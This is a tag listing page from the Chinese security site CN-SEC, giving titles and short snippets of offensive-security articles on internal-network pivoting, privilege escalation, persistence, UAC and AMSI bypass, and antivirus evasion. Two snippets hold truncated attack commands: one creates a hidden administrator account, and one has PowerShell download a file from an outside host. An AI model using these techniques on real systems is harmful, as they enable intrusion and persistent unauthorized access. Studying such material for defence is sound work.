exe - 第 28 | CN-SEC 中文网

安全文章

利用Pystinger Socks4上线不出网主机

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后...

12月24日137 views评论

阅读全文

安全文章

记一次PowerShell配合Metersploit的艰难提权

12月23日115 views评论

阅读全文

安全文章

后渗透之权限维持的13种方法

0x1 匿名用户net user administrator$ woaijiushi /add && net lo...

12月22日132 views评论

阅读全文

安全文章

内网渗透基石篇——权限维持分析

前言专注是做事成功的关键，是健康心灵的特质。当你与所关注的事物融为一体时，就不会让自己萦绕于焦虑之中。专注与放松，是同一枚硬币的两面而已。一个人对一件事只有专注投入才会带来乐趣。一旦你专注投入进去，它...

12月22日110 views评论

阅读全文

安全文章

干货|Bypass UAC 技术总结

一. UAC用户帐户控制（User Account Control，简写作UAC)是微软公司在其[Windows Vista](https://baike.baidu.com/item/Windows...

12月22日92 views评论

阅读全文

安全文章

使用reg管理注册表

目录注册表注册表结构reg增删改查注册表Windows注册表就相当于Windows系统的数据库，系统和软件的配置信息放在注册表里面。如果注册表出现了问题，可能导致系统崩溃。我们平时是使用 ...

12月11日128 views评论

阅读全文

安全文章

渗透Tips - 第十八期

目录使用AMSI扫描接口维持权限绕过AMSI的几种方法一些可尝试绕过白名单的执行使用AMSI扫描接口维持权限https://gist.github.com/b4rtik/48ef702603d5e28...

12月07日113 views评论

阅读全文

安全文章

如何使用PowerShx摆脱软件限制运行PowerShell

关于PowerShxPowerShx是一款功能强大的PowerShell软件，在该工具的帮助下，广大研究人员可以在目标主机上摆脱任何软件的限制从而执行PowerShell代码。PowerShx是Pow...

11月21日110 views评论

阅读全文

安全文章

一些内网渗透所用Poweshell脚本(一)

利用powershell下载一个文件：powershell (new-object System.Net.WebClient).DownloadFile('http://down.3...

11月18日162 views评论

阅读全文

逆向工程

实战 | 进程伪装的思路和研究

前言当我们获取到一台主机的权限过后，拿到了自己想要搜集的信息，这时候我们就会留一个后门进行权限维持，权限维持的学问其实很深，今天就主要介绍其中一种比较简单的权限维持的方法 -- 进程伪装。我们知道在w...

10月31日136 views评论

阅读全文

安全工具

免杀工具Sharperner浅析

前言多看看别人的工具，自己也就会写了。（手动狗头）Sharperner是一款C#编写的自动化免杀工具，用来生成免杀的exe文件或者C++的loader，在antiscan.m...

10月27日260 views评论

阅读全文

安全文章

利用S4u2self进行本地提权

S4u2self可以被用来进行本地提权，假如你拿到一个服务帐号如iis此类的账户，便可以完成此类攻击。因为所有具有spn的用户都可以请求S4U2self。这里以一个计算机账户作为演示。我们先利用tgt...

10月20日270 views评论

阅读全文

利用Pystinger Socks4上线不出网主机

记一次PowerShell配合Metersploit的艰难提权

后渗透之权限维持的13种方法

内网渗透基石篇——权限维持分析

干货|Bypass UAC 技术总结

使用reg管理注册表

渗透Tips - 第十八期

如何使用PowerShx摆脱软件限制运行PowerShell

一些内网渗透所用Poweshell脚本(一)

实战 | 进程伪装的思路和研究

免杀工具Sharperner浅析

利用S4u2self进行本地提权

在线咨询

微信